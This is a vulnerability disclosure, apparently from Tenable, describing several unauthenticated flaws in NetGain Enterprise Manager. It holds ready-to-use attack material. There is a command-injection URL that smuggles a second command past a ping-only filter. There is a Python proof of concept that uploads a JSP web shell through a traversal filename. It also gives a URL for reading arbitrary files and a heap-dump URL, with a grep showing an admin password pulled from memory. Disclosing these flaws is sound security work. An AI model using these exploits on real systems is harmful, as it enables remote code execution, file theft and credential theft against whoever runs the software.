While researching a command injection vulnerability published on Exploit Database, Tenable found multiple remote vulnerabilities in NetGain Enterprise Manager.
CVE-2017-16608: Incomplete Command Injection Patch
NetGain tried to patch the Exploit-DB command injection vulnerability in 7.2.586 build 877. The patch prevented the command injection by adding the following logic:
- The argument parameter must be a valid IP address
- The command must start with “cmd /c ping” or "ping –c 5"
The obvious problem is that an attacker can append additional information after the required command text. For instance, an attacker could make a new directory by using the command argument "cmd /c ping || mkdir C:\Users\Public\fun ||". The following URL is a complete example:
http://[target]:8081/u/jsp/tools/exec.jsp?command=cmd%20%2Fc%20ping%20%7C%7C%20mkdir%20C%3A%5CUsers%5CPublic%5Cfun%20%7C%7C&argument=127.0.0.1&async_output=nessus_56043399
CVE-2017-16610: Unauthenticated JSP Upload and Execution
An unauthenticated remote attacker can upload arbitrary files to the remote server via an HTTP POST request to /u/jsp/backup/upload_save_do.jsp. This is particularly useful because NetGain EM has write access to the web root. Which means that an attacker can upload a JSP web shell. The following proof of concept uploads a web shell to the Javascript directory.
import requests
import sys
from requests_toolbelt.multipart.encoder import MultipartEncoder
if len(sys.argv) != 3:
print 'Usage: ./nsg_backup_upload.py <server_address> <port>'
print 'Example: python ./nsg_backup_upload.py 192.168.1.38 8081'
sys.exit(0);
jsp_shell = (
'<%@ page import=\"java.util.*,java.io.*\"%>\n'
'<html><body>'
'<form method=\"GET\" name=\"myform\" action=\"\">\n'
'<input type=\"text\" name=\"cmd\">\n'
'<input type=\"submit\" value=\"Send\">\n'
'</form>\n'
'<pre>\n'
'<%\n'
'if (request.getParameter(\"cmd\") != null) {\n'
'out.println(\"Command: \" + request.getParameter(\"cmd\") + \"<br>\");\n'
'Process p = Runtime.getRuntime().exec(request.getParameter(\"cmd\"));\n'
'OutputStream os = p.getOutputStream();\n'
'InputStream in = p.getInputStream();\n'
'DataInputStream dis = new DataInputStream(in);\n'
'String disr = dis.readLine();\n'
'while ( disr != null ) {\n'
'out.println(disr);\n'
'disr = dis.readLine();\n'
'}\n'
'}\n'
'%>\n'
'</pre></body></html>')
multipart_data = MultipartEncoder(
fields =
{
'file': ('../u/js/shell.jsp', jsp_shell, 'text/plain')
})
response = requests.post('http://' + sys.argv[1] + ':' + sys.argv[2] + '/u/jsp/backup/upload_save_do.jsp',
data=multipart_data, headers={'Content-Type': multipart_data.content_type})
CVE-2017-16609: Unauthenticated File Download
An unauthenticated remote attacker can download any file on the remote server via an HTTP GET (or POST) request. The following URL will download C:\Windows\win.ini:
http://[target]:8081/u/jsp/common/download.jsp?filename=win.ini&srcDir=C:\Windows
CVE-2017-16607: Unauthenticated Information Disclosure
NetGain EM allows an unauthenticated remote attacker to download all of the process's heap memory using the following URL:
http://[target]:8081/u/jsp/settings/heapdumps.jsp?dumpnow=1
The attacker can then search the memory for interesting information such as credentials. For example, Tenable found the admin username and password in a dump using the following method:
albinolobster@ubuntu:~$ strings ./heapdump_2017_03_07_15_48_34.bin | grep username=
username=admin&password=thisismypassword%21
CVE-2017-17406: Unsafe Java Object Deserialization
NetGain EM exposes a couple of Java RMI Registries on ports 1800 and 1850. Also, NetGain uses a few Java libraries that are known to be useful in Java deserialization attacks including bsh, Apache Commons Collections, and Apache Commons FileUpload. Tenable confirmed an unauthenticated remote attacker could achieve remote code execution using a deserialization attack over RMI.